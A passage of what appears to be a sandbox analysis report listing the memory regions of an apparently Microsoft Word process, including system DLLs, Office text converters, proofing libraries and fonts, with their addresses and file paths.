(normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 303 start_va = 0x75300000 end_va = 0x75307fff entry_point = 0x75300000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 304 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 305 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x75340000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 306 start_va = 0x753b0000 end_va = 0x753d8fff entry_point = 0x753b0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 307 start_va = 0x753e0000 end_va = 0x753edfff entry_point = 0x753e0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 308 start_va = 0x753f0000 end_va = 0x753fafff entry_point = 0x753f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 309 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x75460000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 310 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75470000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 311 start_va = 0x754c0000 end_va = 0x754e6fff entry_point = 0x754c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 312 start_va = 0x754f0000 end_va = 0x7551cfff entry_point = 0x754f0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 313 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 314 start_va = 0x756d0000 end_va = 0x756e1fff entry_point = 0x756d0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 315 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 316 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75710000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 317 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 318 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x758a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 319 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x764f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 320 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x76590000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 321 start_va = 0x766f0000 end_va = 0x76772fff entry_point = 0x766f0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 322 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x76780000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 323 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x76830000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 324 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76840000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 325 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x76890000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 326 start_va = 0x769a0000 end_va = 0x76b3cfff entry_point = 0x769a0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 327 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b40000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 328 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 329 start_va = 0x76c60000 end_va = 0x76e5afff entry_point = 0x76c60000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 330 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 331 start_va = 0x76f00000 end_va = 0x77035fff entry_point = 0x76f00000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 332 start_va = 0x77040000 end_va = 0x77134fff entry_point = 0x77040000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 333 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x77140000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 334 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 335 start_va = 0x773f0000 end_va = 0x773f4fff entry_point = 0x773f0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 336 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77400000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 337 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x77420000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 338 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 339 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 340 start_va = 0x7ff90000 end_va = 0x7ff9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff90000" filename = "" Region: id = 341 start_va = 0x7ffa0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffa0000" filename = "" Region: id = 342 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 343 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 344 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 345 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 346 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 347 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 348 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 349 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 350 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 351 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 352 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 353 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 354 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 355 start_va = 0x680000 end_va = 0x68efff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 356 start_va = 0x800000 end_va = 0x81efff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 357 start_va = 0x840000 end_va = 0x85efff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 358 start_va = 0x860000 end_va = 0x87dfff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 359 start_va = 0x10a0000 end_va = 0x10befff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 360 start_va = 0x11a0000 end_va = 0x11befff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 361 start_va = 0x23c0000 end_va = 0x23defff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 362 start_va = 0x23e0000 end_va = 0x23fefff entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 363 start_va = 0x2400000 end_va = 0x2420fff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 364 start_va = 0x2470000 end_va = 0x248efff entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 365 start_va = 0x2490000 end_va = 0x24adfff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 366 start_va = 0x24d0000 end_va = 0x24eefff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 367 start_va = 0x4b50000 end_va = 0x4c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 368 start_va = 0x723b0000 end_va = 0x723dffff entry_point = 0x723b0000 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 369 start_va = 0x72390000 end_va = 0x723aefff entry_point = 0x72390000 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 370 start_va = 0x72380000 end_va = 0x7239efff entry_point = 0x72397511 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 371 start_va = 0x723a0000 end_va = 0x723dcfff entry_point = 0x723a0000 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 372 start_va = 0x72360000 end_va = 0x7239cfff entry_point = 0x7238c00f region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 373 start_va = 0x723a0000 end_va = 0x723befff entry_point = 0x723b7511 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 374 start_va = 0x723d0000 end_va = 0x723d7fff entry_point = 0x723d0000 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files\\Microsoft Office\\Office15\\Wordcnvpxy.cnv" (normalized: "c:\\program files\\microsoft office\\office15\\wordcnvpxy.cnv") Region: id = 375 start_va = 0x723c0000 end_va = 0x723c7fff entry_point = 0x723c33bc region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files\\Microsoft Office\\Office15\\Wordcnvpxy.cnv" (normalized: "c:\\program files\\microsoft office\\office15\\wordcnvpxy.cnv") Region: id = 376 start_va = 0x723d0000 end_va = 0x723dafff entry_point = 0x723d0000 region_type = mapped_file name = "recovr32.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv") Region: id = 377 start_va = 0x723b0000 end_va = 0x723cefff entry_point = 0x723c7511 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 378 start_va = 0x72390000 end_va = 0x723aefff entry_point = 0x723a7511 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 379 start_va = 0x723b0000 end_va = 0x723dffff entry_point = 0x723d1601 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 380 start_va = 0x72380000 end_va = 0x7239efff entry_point = 0x72397511 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 381 start_va = 0x723a0000 end_va = 0x723dcfff entry_point = 0x723cc00f region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 382 start_va = 0x72360000 end_va = 0x7239cfff entry_point = 0x7238c00f region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 383 start_va = 0x723a0000 end_va = 0x723befff entry_point = 0x723b7511 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 384 start_va = 0x6c0000 end_va = 0x6c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 385 start_va = 0x6d0000 end_va = 0x6d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 386 start_va = 0x4c50000 end_va = 0x4d16fff entry_point = 0x4c50000 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 387 start_va = 0x72350000 end_va = 0x723dbfff entry_point = 0x72350000 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 388 start_va = 0x729b0000 end_va = 0x729ebfff entry_point = 0x729b0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 389 start_va = 0x6e0000 end_va = 0x6e0fff entry_point = 0x6e0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 390 start_va = 0x820000 end_va = 0x820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 391 start_va = 0x880000 end_va = 0x891fff entry_point = 0x880000 region_type = mapped_file name = "uiautomationcore.dll.mui" filename = "\\Windows\\System32\\en-US\\UIAutomationCore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\uiautomationcore.dll.mui") Region: id = 392 start_va = 0x7e60000 end_va = 0x8311fff entry_point = 0x0 region_type = private name = "private_0x0000000007e60000" filename = "" Region: id = 393 start_va = 0x84e0000 end_va = 0x85dffff entry_point = 0x0 region_type = private name = "private_0x00000000084e0000" filename = "" Region: id = 394 start_va = 0x6f110000 end_va = 0x6f118fff entry_point = 0x6f110000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 395 start_va = 0x75890000 end_va = 0x75892fff entry_point = 0x75890000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 396 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 397 start_va = 0x70100000 end_va = 0x7016ffff entry_point = 0x70100000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 398 start_va = 0x75290000 end_va = 0x752a8fff entry_point = 0x75290000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 399 start_va = 0x70170000 end_va = 0x7017afff entry_point = 0x70170000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 400 start_va = 0x74190000 end_va = 0x74199fff entry_point = 0x74190000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 401 start_va = 0x6e620000 end_va = 0x6e651fff entry_point = 0x6e620000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 402 start_va = 0x85e0000 end_va = 0x8ddffff entry_point = 0x0 region_type = private name = "private_0x00000000085e0000" filename = "" Region: id = 403 start_va = 0x8de0000 end_va = 0xa134fff entry_point = 0x8de0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 404 start_va = 0x74740000 end_va = 0x74764fff entry_point = 0x74740000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 513 start_va = 0x10f0000 end_va = 0x10f0fff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 514 start_va = 0x12f0000 end_va = 0x12f1fff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 515 start_va = 0x2430000 end_va = 0x2431fff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 516 start_va = 0x24b0000 end_va = 0x24b1fff entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 517 start_va = 0x25f0000 end_va = 0x25f1fff entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 518 start_va = 0x2610000 end_va = 0x2611fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 519 start_va = 0x2630000 end_va = 0x2631fff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 520 start_va = 0x2750000 end_va = 0x2751fff entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 521 start_va = 0x3ce0000 end_va = 0x3ce1fff entry_point = 0x0 region_type = private name = "private_0x0000000003ce0000" filename = "" Region: id = 522 start_va = 0x3d00000 end_va = 0x3d01fff entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 523 start_va = 0x8320000 end_va = 0x83cafff entry_point = 0x8320000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 524 start_va = 0x83d0000 end_va = 0x849bfff entry_point = 0x83d0000 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 525 start_va = 0xa140000 end_va = 0xa23ffff entry_point = 0x0 region_type = private name = "private_0x000000000a140000" filename = "" Region: id = 526 start_va = 0xa240000 end_va = 0xa3ccfff entry_point = 0xa240000 region_type = mapped_file name = "cambria.ttc" filename = "\\Windows\\Fonts\\cambria.ttc" (normalized: "c:\\windows\\fonts\\cambria.ttc") Region: id = 527 start_va = 0xa3d0000 end_va = 0xa4a0fff entry_point = 0xa3d0000 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 528 start_va = 0xa4b0000 end_va = 0xa580fff entry_point = 0x0 region_type = private name = "private_0x000000000a4b0000" filename = "" Region: id = 529 start_va = 0x74fd0000 end_va = 0x74fe6fff entry_point = 0x74fd0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 530 start_va = 0x74b60000 end_va = 0x74b9cfff entry_point = 0x74b60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 531 start_va = 0x72170000 end_va = 0x721a6fff entry_point = 0x72170000 region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\office15\\msproof7.dll") Region: id = 629 start_va = 0x800000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 630 start_va = 0x810000 end_va = 0x81ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 631 start_va = 0x840000 end_va = 0x870fff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 632 start_va = 0x10a0000 end_va = 0x10a1fff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 633 start_va = 0x10b0000 end_va = 0x10b0fff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 634 start_va = 0x10d0000 end_va = 0x10d0fff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 635 start_va = 0x10e0000 end_va = 0x10e0fff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 636 start_va = 0x1100000 end_va = 0x1100fff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 637 start_va = 0x11a0000 end_va = 0x11a0fff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 638 start_va = 0x6da0000 end_va = 0x7167fff entry_point = 0x0 region_type = private name = "private_0x0000000006da0000" filename = "" Region: id = 639 start_va = 0x7ec0000 end_va = 0x7fbffff entry_point = 0x0 region_type = private name = "private_0x0000000007ec0000" filename = "" Region: id = 640 start_va = 0x60230000 end_va = 0x606b5fff entry_point = 0x60230000 region_type = mapped_file name = "msgr3en.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\PROOF\\1033\\MSGR3EN.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\proof\\1033\\msgr3en.dll") Region: id = 641 start_va = 0x7ff8f000 end_va = 0x7ff8ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff8f000" filename = "" Region: id = 669 start_va = 0x10c0000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 670 start_va = 0x7fc0000 end_va = 0x8111fff entry_point = 0x0 region_type = private name = "private_0x0000000007fc0000" filename = "" Region: id = 671 start_va = 0x8120000 end_va = 0x821ffff entry_point = 0x0 region_type = private name = "private_0x0000000008120000" filename = "" Region: id = 672 start_va = 0xa590000 end_va = 0xa92cfff entry_point = 0xa590000 region_type = mapped_file name = "msgr3en.lex" filename = "\\Program Files\\Microsoft Office\\Office15\\PROOF\\MSGR3EN.LEX" (normalized: "c:\\program files\\microsoft office\\office15\\proof\\msgr3en.lex") Region: id = 673 start_va = 0x75350000 end_va = 0x753aefff entry_point = 0x75350000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 674 start_va = 0x600a0000 end_va = 0x60129fff entry_point = 0x600a0000 region_type = mapped_file name = "msspell7.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\PROOF\\msspell7.dll" (normalized: "c:\\program files\\microsoft office\\office15\\proof\\msspell7.dll") Region: id = 675 start_va = 0x840000 end_va = 0x850fff entry_point = 0x840000 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 676 start_va = 0x860000 end_va = 0x870fff entry_point = 0x860000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 677 start_va = 0x23b0000 end_va = 0x23e0fff entry_point = 0x23b0000 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 678 start_va = 0x23f0000 end_va = 0x2400fff entry_point = 0x23f0000 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 679 start_va = 0x2410000 end_va = 0x2420fff entry_point = 0x2410000 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 680 start_va = 0x7e60000 end_va = 0x7f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000007e60000" filename = "" Region: id = 681 start_va = 0xaac0000 end_va = 0xaacffff entry_point = 0x0 region_type = private name = "private_0x000000000aac0000" filename = "" Region: id = 682 start_va = 0x5fee0000 end_va = 0x5ff40fff entry_point = 0x5fee0000 region_type = mapped_file name = "mscss7en.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\mscss7en.dll" (normalized: "c:\\program files\\microsoft office\\office15\\mscss7en.dll") Region: id = 683 start_va = 0x5ff50000 end_va = 0x6009bfff entry_point = 0x5ff50000 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files\\Microsoft Office\\Office15\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\office15\\proof\\mssp7en.lex") Region: id = 684 start_va = 0x5fe60000 end_va = 0x5fedefff entry_point = 0x5fe60000 region_type = mapped_file name = "css7data0009.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\CSS7DATA0009.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\css7data0009.dll") Region: id = 685 start_va = 0x800000 end_va = 0x80efff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 686 start_va = 0x810000 end_va = 0x810fff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 687 start_va = 0x11b0000 end_va = 0x11b1fff 